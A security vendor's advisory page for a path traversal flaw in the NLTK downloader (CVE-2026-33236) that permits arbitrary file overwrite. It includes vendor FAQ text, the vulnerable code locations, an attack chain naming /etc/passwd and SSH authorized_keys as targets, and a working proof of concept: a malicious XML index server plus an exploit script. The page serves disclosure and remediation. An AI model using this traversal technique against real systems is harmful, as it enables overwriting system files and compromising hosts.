How severe is GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 has a CVSS score of 8.1/10, rated HIGH. Immediate patching is strongly recommended.

Which packages are affected by GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 affects the following packages: nltk (PyPI). Ecosystems affected: PyPI.

How do I fix GHSA-469j-vmhf-r6v7?

No patched version of nltk has shipped for GHSA-469j-vmhf-r6v7 yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.

How do I detect GHSA-469j-vmhf-r6v7 in my PyPI dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for nltk. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-469j-vmhf-r6v7 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-469j-vmhf-r6v7?

O3 pinpoints whether GHSA-469j-vmhf-r6v7 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-469j-vmhf-r6v7 actively exploited in the wild?

No public exploit code has been indexed for GHSA-469j-vmhf-r6v7 yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 has an EPSS (Exploit Prediction Scoring System) score of 0.4%, placing it in the 31th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-469j-vmhf-r6v7?

GHSA-469j-vmhf-r6v7 is classified as Path Traversal (CWE-22). This weakness type describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation. This is a high-impact weakness class that often enables remote code execution or data exposure.

When was GHSA-469j-vmhf-r6v7 published, and has it been updated?

GHSA-469j-vmhf-r6v7 was published on March 19, 2026 and was last updated on March 25, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐍 PyPI

GHSA-469j-vmhf-r6v7

HIGH

NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite

Also known asCVE-2026-33236

Published

Mar 19, 2026

Updated

Mar 25, 2026

Affected

1 pkg

Patched

None yet

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.4%probability of exploitation in next 30 days

Lower Risk31th percentile+0.37%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐍nltk

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.

Description

Vulnerability Description

The NLTK downloader does not validate the subdir and id attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as ../), which can lead to:

Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
Arbitrary File Creation: Create arbitrary files
Arbitrary File Overwrite: Overwrite critical system files (such as /etc/passwd, ~/.ssh/authorized_keys, etc.)

Vulnerability Principle

Key Code Locations

1. XML Parsing Without Validation (nltk/downloader.py:253)

self.filename = os.path.join(subdir, id + ext)

subdir and id are directly from XML attributes without any validation

2. Path Construction Without Checks (nltk/downloader.py:679)

filepath = os.path.join(download_dir, info.filename)

Directly uses filename which may contain path traversal

3. Unrestricted Directory Creation (nltk/downloader.py:687)

os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)

Can create arbitrary directories outside the download directory

4. File Writing Without Protection (nltk/downloader.py:695)

with open(filepath, "wb") as outfile:

Can write to arbitrary locations in the file system

Attack Chain

1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. System file is overwritten!

Impact Scope

System File Overwrite

Reproduction Steps

Environment Setup

Install NLTK

pip install nltk

Prepare malicious server and exploit script (see PoC section)

Reproduction Process

Step 1: Start malicious server

python3 malicious_server.py

Step 2: Run exploit script

python3 exploit_vulnerability.py

Step 3: Verify results

ls -la /tmp/test_file.zip

Proof of Concept

Malicious Server (malicious_server.py)

#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file" subdir="../../../../../../../../../tmp" 
             url="http://127.0.0.1:8888/test.zip" 
             size="100" unzipped_size="100" unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")

# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()
    
    def log_message(self, format, *args):
        pass

# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")

Exploit Script (exploit_vulnerability.py)

#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile

def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")
    
    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)
    
    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print(f"✗ Path traversal attack successful!")
    else:
        print(f"\n? File not found, download may have failed")

if __name__ == "__main__":
    exploit()

Execution Results

✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!

Affected Packages

1 total

Ecosystem	Package	Vulnerable range	Fix
🐍PyPI	`nltk`	all versions	No fix

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for nltk. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of nltk has shipped for GHSA-469j-vmhf-r6v7 yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-469j-vmhf-r6v7 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-469j-vmhf-r6v7. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Vulnerability Description The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to: 1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system 2. **Arbitrary File Creation**: Create arbitrary files 3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.) ## Vulnerability Principle ### Key

O3 Security · Impact-Aware SCA

Is GHSA-469j-vmhf-r6v7 in your dependencies?

O3 detects GHSA-469j-vmhf-r6v7 across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works